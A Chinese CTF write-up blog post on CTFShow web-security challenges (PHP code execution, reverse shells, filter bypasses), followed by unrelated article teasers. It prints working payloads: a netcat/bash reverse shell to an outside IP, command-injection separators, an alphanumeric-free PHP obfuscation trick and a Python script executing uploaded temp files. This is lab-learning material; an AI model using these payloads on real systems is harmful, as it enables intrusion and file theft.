当前位置: 首页 > article >正文

CTFShow _Web应用安全与防护 第二章WP

1.一句话木马变形看到了php代码解释器那么就可以输入一些php代码看看是否有什么过滤先输入一个phpinfo();成功返回了php相关信息那么可以尝试一些命令注入system(ls);成功返回了当前目录下的文件看到了flag文件那么就可以直接读取flag文件即可继续使有system函数system(tac fl*);这里提示了过滤信息那么就直接想到了无参数函数只需要函数之间的调用就可以实现读取文件show_source(next(array_reverse(scandir(pos(localeconv())))));这里粗略解释一下具体了解可以问问ai函数作用localeconv()返回系统本地化信息的数组核心数组第一个元素固定是 .当前目录pos()等价于current()获取数组的第一个元素 → 最终得到.当前目录scandir(.)扫描当前目录下的所有文件 / 目录返回数组比如[., .., flag.php, index.php]array_reverse()反转数组 → 比如[index.php, flag.php, .., .]next()将数组指针移到下一个元素并返回反转后数组第一个元素是index.phpnext()取第二个 →flag.phpshow_source()等价于highlight_file()高亮显示指定文件的内容 → 最终显示flag.php2.反弹shell构造刚刚开始还可以和上面的关卡一样测试但是这关只会返回“实现成功”典型的无回显的php想到题目说的反弹shell那么就可以直接进行反弹shell//在kali中输入x是与在题目一样的端口 nc -lvnp x //题目中输入 bash -i /dev/tcp/ip/端口 01 //这里我先是尝试bash但是没有成功说明靶场环境受限制了 nc -c sh ip 端口 //nc是大多数 Linux / 类 Unix 系统默认安装 nc或 busybox nc不管目标机是 bash/dash/sh只要有sh和nc就能执行看到页面一直加载说明就成功了到kail中就可以看到这里还有第二种方法写入静态文件先测试一下这个功能能不能使用echo 1 1.txt //将1写入当前目录的1.txt文档如歌当前目录没有这个文件那么就创建一个我们成功访问到了1.txt中我们写入的内容那么就可以使用这个方法那么就写入执行命令到txt文档中即可echo ls 1.txt echo tac fl* 1.txt //这里使用的是反引号反引号是php执行运算符php将尝试反引号中的内容作为shell命令来执行并将结果输出通过echo就可以输出看到3.管道符绕过过滤这关会自动执行一个ls命令只要能拼接上另外一个命令即可这里使用这些都可以tac fl* tac fl* |tac fl* ;tac fl* ctfshow||tac flag.php4.无字母数字代码执行这关比较特殊尝试了大多数命令都无法执行因为这关禁用了所有的数字和字母但是唯独对其他字符进行限制那我们可以尝试通过其他字符进行转化成为我们需要这里可以使用url编码取反操作?php ​ $systemsystem; ​ $commandtac flag.php; ​ echo (~.urlencode(~$system).)(~.urlencode(~$command).);;//这里记得加上; //下面验证还原 echo (.~urldecode($k1).)(.~urldecode($k2).); ? //使用这三步操作是先将命令取反为了躲避过滤取反一般为不可见字符。然后进行url编码url编码是因为php会自动解码。最后输出时候再在输出语句前面添加上~PHP在解析这段字符时候御剑~会自动取反。5.无字母数字命令执行这关看似和上关类似同样禁用了数字和字母但是发现使用上关相同的payload时并没有输出flag只是输出我们输入的命令。说明大概率为无回显的这里我尝试了写入静态文件也没有成功这里借鉴了别的地方的方法这里先给代码再进行讲解。这段 Python 代码的核心是通过 HTTP POST 请求持续攻击目标服务器利用文件上传 代码注入的方式执行系统命令读取 flag.php并循环检测响应中是否包含CTF{格式的 flag找到后立即输出并停止循环。import requests # 导入发送HTTP请求的库 import time # 导入时间相关库用于循环等待 ​ url http://localhost:5058 # 目标攻击地址本地测试 ​ # 1. 准备要上传的文件payload.txt里写了要执行的命令tac /var/www/html/flag.php file {file: open(payload.txt, r)} ​ # 2. 核心注入payload. /???/????????[-[] —— 这是Linux命令注入的模糊匹配写法 data {code: . /???/????????[-[]} ​ # 3. 无限循环发起请求直到拿到flag while True: # 发送POST请求上传文件 提交注入的code参数 response requests.post(url, filesfile, datadata) # 检测响应中是否包含CTF{flag的特征 if response.text.find(CTF{)! -1: # 提取从CTF{开始到最后一位的内容即完整flag flag response.text[response.text.find(CTF{):-1] print(flag) # 输出flag break # 找到flag后退出循环 else: print(Waiting for flag...) # 未找到则提示 time.sleep(1) # 等待1秒后再次请求这关与web入门中的web55类似那一关只不过可以使用数字就还可以使用其他方法而这关目前也只了解这一种做法我简单讲一下原理我们可以发送一个上传文件的POST包此时PHP会将我们上传的文件保存在临时文件夹下默认的文件名是/tmp/phpXXXXXX文件名最后6个字符是随机的大小写字母。[-[]可以用来通配表示大写字母因为大写字母在与 [之间过滤掉干扰文件最后一位一般为大写而在linux系统下.是可以用来执行任意脚本文件的利用这两点我们可以构造payload。具体操作大家可以尝试一下web55练习一下那关wp我也会给大家借鉴一下。

相关文章:

CTFShow _Web应用安全与防护 第二章WP

1.一句话木马变形看到了php代码解释器,那么就可以输入一些php代码,看看是否有什么过滤,先输入一个 phpinfo();成功返回了php相关信息,那么可以尝试一些命令注入system(ls);成功返回了当前目录下的文件,看到了flag文件&…...

如何在ESP32上运行TinyML模型

在ESP32上运行TinyML模型,主要流程可以概括为“在电脑上训练模型 -> 转换为轻量格式 -> 部署到设备进行推理”。下面梳理出三种主流的可行方案,你可以根据自己的技术背景和项目需求进行选择。核心流程概览无论选择哪种方案,都遵循类似的…...

C++中的前置自增运算符与后置自增运算符

C中的前置自增运算符与后置自增运算符 语义上的区别 i, 后置自增, 先返回旧值, 再自增; i, 前置自增, 先自增, 再返回旧值; 程序测试#include <iostream>using namespace std;int main() {int a {1}, b {a}, c {a};cout << "a " << a << en…...

低成本边缘AI硬件开发实战:从芯片选型到量产部署

低成本边缘AI硬件开发实战&#xff1a;从芯片选型到量产部署 引言 边缘AI正快速渗透智能制造、智能安防、宠物科技等中小企业市场。然而&#xff0c;高昂的硬件成本、复杂的开发流程成为落地瓶颈。上海拓匡科技近期为多家中小企业完成边缘AI硬件全流程交付&#xff0c;本文分享…...

Web实现电脑画面预览鼠标远程操作

使用pyhon实现web预览电脑画面以及鼠标远程操作 1 界面效果 2 电脑端程序 tmp.py import asyncio import websockets import json import base64 import io import time from PIL import ImageGrab import pyautogui from PIL import Image...

Ubuntu 22.04下RTX 4090多卡训练Qwen-14B,NCCL通信报错怎么解?(实测有效)

Ubuntu 22.04下RTX 4090多卡训练Qwen-14B的NCCL通信问题解决方案 最近在Ubuntu 22.04系统上使用RTX 4090显卡进行Qwen-14B模型的多卡训练时&#xff0c;遇到了一个典型的NCCL通信报错问题。这个错误不仅影响了训练效率&#xff0c;还让不少开发者陷入了调试的困境。本文将深入分…...

2026商用免许可音乐全攻略:合法商用无压力的优质平台终极盘点

在短视频、品牌营销、商业播客内容井喷的2026年&#xff0c;商用音乐的版权合规与成本控制&#xff0c;已成为内容创作者、营销团队和企业绕不开的核心问题。传统音乐授权流程繁琐、持续支付版税成本高昂&#xff0c;而商用免许可音乐凭借一次性付费甚至零成本、授权清晰、合法…...

人工智能时代算力基建哪家强?

中国联通与中国电信&#xff1a;人工智能、云计算、无人驾驶与机器人通信的竞争优势分析 ——基于2025-2026年券商研报与行业动态的深度解读 摘要 在“十五五”规划开局之年&#xff08;2026年&#xff09;&#xff0c;中国通信行业正经历从“传统管道商”向“数字智能服务商”…...

健康有益健康监测座舱:以科技之力,定义出行健康新标杆

汽车产业新四化浪潮席卷而来&#xff0c;当汽车从代步工具升级为智能移动空间&#xff0c;驾乘者对健康出行的需求也迎来质的飞跃。如今&#xff0c;单纯的座舱舒适配置已无法满足用户期待&#xff0c;出行即健康守护成为新的消费痛点&#xff0c;也成为车企突破同质化竞争的核…...

gorm 中的Updates Update, Save,Create , UpdateColumn 区别与联系

在 GORM&#xff08;Go 的 ORM 库&#xff09;中Updates、Update、Save、Create、UpdateColumn 等方法都用于数据的写入或更新&#xff0c;但它们的行为、触发的钩子&#xff08;Hooks&#xff09;、性能、适用场景有显著区别。以下是详细对比与联系:一、核心方法对比表方法用途…...

错误弹窗记录

public partial class ErrorForm : Form{private static string error_str "系统错误";public ErrorForm(){InitializeComponent();pictureBox1.Image SystemIcons.Error.ToBitmap();pictureBox1.SizeMode PictureBoxSizeMode.StretchImage;label1.Text Error_st…...

从CUDA到MUSA(四):GPU架构揭秘——从Warp到Occupancy

引言&#xff1a;从代码到硬件的深层理解 在前三篇博客中&#xff0c;我们完成了GPU编程的"入门三部曲"&#xff1a;理解异构计算的设计哲学、编写第一个向量加法程序、掌握多维线程组织与数据映射。至此&#xff0c;你已经能够写出正确的GPU程序。 但正确只是起点。…...

2026 年四可改造最后期限!这些省份必须完成

摘要&#xff1a;2026 年是分布式光伏四可改造的关键年份&#xff0c;多个省份明确最后完成期限。本文汇总 45 省市四可改造政策时间要求&#xff0c;帮您快速了解所在地区截止时间、改造要求和未完成后果。建议收藏备用&#xff01;关键词&#xff1a;四可改造、2026 年、最后…...

计算机毕业设计springboot校园智能卡管理系统设计与实现 高校一卡通数字化管理平台的设计与实现 基于Spring Boot框架的校园智慧卡服务系统开发

计算机毕业设计springboot校园智能卡管理系统设计与实现8wbp89&#xff08;配套有源码 程序 mysql数据库 论文&#xff09; 本套源码可以在文本联xi,先看具体系统功能演示视频领取&#xff0c;可分享源码参考。随着高校信息化建设的深入推进&#xff0c;传统校园卡管理模式已难…...

Dify 模型供应商下载失败解决办法

问题现象&#xff1a; 部署或使用 Dify 时&#xff0c;模型供应商&#xff08;如 OpenAI、Anthropic 等&#xff09;的依赖包下载失败&#xff0c;提示网络连接超时或资源不可用。 原因定位&#xff1a; langgenius/dify: Production-ready platform for agentic workflow dev…...

音叉这玩意儿在光热振动里真是妙啊,特别是用COMSOL建模的时候,玩参数就像调电子琴的旋钮。先给你们看段核心参数设置代码

COMSOL仿真模型音叉光热致振动光源频率、光斑直径、光斑位置可调&#xff0c;特征频率振型model.param.set(f0, 32[Hz], 基准频率) model.param.set(d_spot, 20[um], 光斑直径) model.param.set(x_pos, 0.5*L_tine, 光斑横向位置) 这三个参数直接决定了音叉会不会"唱歌&qu…...

java基于微信小程序的物流仓储管理系统 可视化

目录系统架构设计核心功能模块划分技术实现路径性能优化策略测试验证方案部署运维建议项目技术支持可定制开发之功能创新亮点源码获取详细视频演示 &#xff1a;文章底部获取博主联系方式&#xff01;同行可合作系统架构设计 采用前后端分离架构&#xff0c;前端使用微信小程序…...

数据中台数据权限体系:基于RBAC的精细控制

数据中台数据权限体系:基于RBAC的精细控制 关键词:数据中台、数据权限、RBAC、访问控制、数据安全、权限管理、数据治理 摘要:本文深入探讨了数据中台环境下基于RBAC(基于角色的访问控制)的数据权限体系设计与实现。文章首先介绍了数据中台权限管理的核心挑战,然后详细解析…...

污水处理施耐德TM218 PLC程序开发与分享

污水处理施耐德TM218PLC程序&#xff0c;SoMachine V4.3软件设计&#xff0c;带软件下载链接&#xff0c;带io分配和注释最近做了一个污水处理相关的施耐德TM218 PLC项目&#xff0c;用SoMachine V4.3软件进行设计&#xff0c;在这里和大家分享一下整个过程&#xff0c;还会给出…...

9大主流CRM核心能力对比:从线索到报表的全流程专业解析

9大主流CRM核心能力横向对比&#xff1a;从线索到报表的全流程专业解析CRM&#xff08;客户关系管理&#xff09;的核心价值在于将“客户”从零散数据转化为可运营的资产&#xff0c;其能力边界覆盖“线索获取-客户运营-商机转化-订单交付-数据复盘”的全生命周期。本文基于线索…...

别让AI把你带沟里:调教这货帮你写代码的实战指南

现在这年头&#xff0c;写代码要是没个AI傍身&#xff0c;出门都不好意思跟人打招呼。GitHub Copilot、ChatGPT、Claude……这些名字一个个听着跟漫威英雄似的。很多哥们儿心想&#xff1a;“这下稳了&#xff0c;以后我只要动动嘴&#xff0c;代码让AI写&#xff0c;我负责躺平…...

ChurchCRM SQL注入漏洞(CNVD-2026-12565、CVE-2026-24854)

ChurchCRM 是一款开源的教堂客户关系管理系统&#xff0c;采用 PHP 开发&#xff0c;支持成员管理、贡献跟踪、事件安排及多语言沟通等功能。系统界面友好&#xff0c;操作简单&#xff0c;且提供详尽文档与活跃社区支持&#xff0c;助力教堂高效管理日常运营。 国家信息安全漏…...

Spring面试高频题:从基础到源码,通俗拆解+避坑指南

本文拒绝晦涩难懂的源码堆砌&#xff0c;用“通俗类比细节拆解面试真题”的方式&#xff0c;把Spring面试中最常考、最易踩坑的知识点讲透&#xff0c;不管是初级面试还是中级面试&#xff0c;都能直接套用&#xff0c;帮你轻松拿下Spring相关考题。一、Spring基础认知&#xf…...

使用yolov26实现目标检测

一、创建虚拟环境 打开anaconda&#xff0c;选择Anaconda Prompt。 创建一个新的python环境&#xff0c;这里以yolov26命名新建环境&#xff0c;python使用3.12。 conda create -n yolo26 python3.12 回车后出现新建环境提醒输入 y 继续&#xff0c;耐心等待全部下载完成后自…...

从入门到精通:Kafka核心原理与实战避坑指南

在分布式系统中&#xff0c;消息队列是实现高可用、高并发、解耦的核心组件&#xff0c;而Kafka作为当下最流行的分布式消息队列之一&#xff0c;凭借高吞吐量、高可靠性、可扩展性等优势&#xff0c;广泛应用于日志收集、消息分发、流处理等场景。无论是后端开发、大数据处理&…...

Unity网络基础UDP客户端

第一部分&#xff1a;核心概念预习在看代码之前&#xff0c;你需要明白这几个核心概念&#xff1a;UDP (User Datagram Protocol)&#xff1a;就像寄明信片。你只管把信发出去&#xff0c;不需要先跟对方建立连接&#xff0c;速度极快&#xff0c;但不保证对方一定能收到&#…...

feed二级缓存设计day05

背景&#xff1a;feed流&#xff1a;投喂流&#xff0c;主动把消息发给我们&#xff0c;类似于朋友圈别人的消息组成了我的主页feed流与内容详情是该社区访问最多的接口&#xff0c;面临着以下挑战&#xff1a;- **高并发读压力**&#xff1a;首页 Feed 与热门内容详情同一时刻…...

SpringBoot+Vue 办公信息系统管理平台源码免费分享【适合毕设/课设/学习】Java+Vue+MySQL

【源码在文章最后】 ## 项目概述 办公自动化系统&#xff08;Office Automatic System&#xff0c;简称OA&#xff09;是一个基于Spring Boot和Vue.js的企业级办公管理平台&#xff0c;旨在提高企业内部办公效率&#xff0c;实现办公流程的数字化和自动化。 ## 项目信息 - *…...

新能源汽车车载双向OBC,PFC,LLC,V2G 双向充电桩MATLAB仿真模型及应用分析

新能源汽车车载双向OBC&#xff0c;PFC&#xff0c;LLC&#xff0c;V2G 双向 充电桩 电动汽车 车载充电机 充放电机 MATLAB仿真模型 : &#xff08;1&#xff09;基于V2G技术的双向AC/DC、DC/DC充放电机MATLAB仿真模型&#xff1b; &#xff08;2&#xff09;前级电路为双向AC/…...

基于单片机的药品分拣系统

一、系统介绍 目前&#xff0c;随着当今社会老龄化进程的逐步加剧&#xff0c;我们在新闻中经常能看到老人跌倒了&#xff0c;无人扶&#xff0c;进而导致老人的死亡。对于这种悲剧&#xff0c;我们也很无奈&#xff0c;因为怕扶了老人&#xff0c;可能会被讹&#xff0c;老年人…...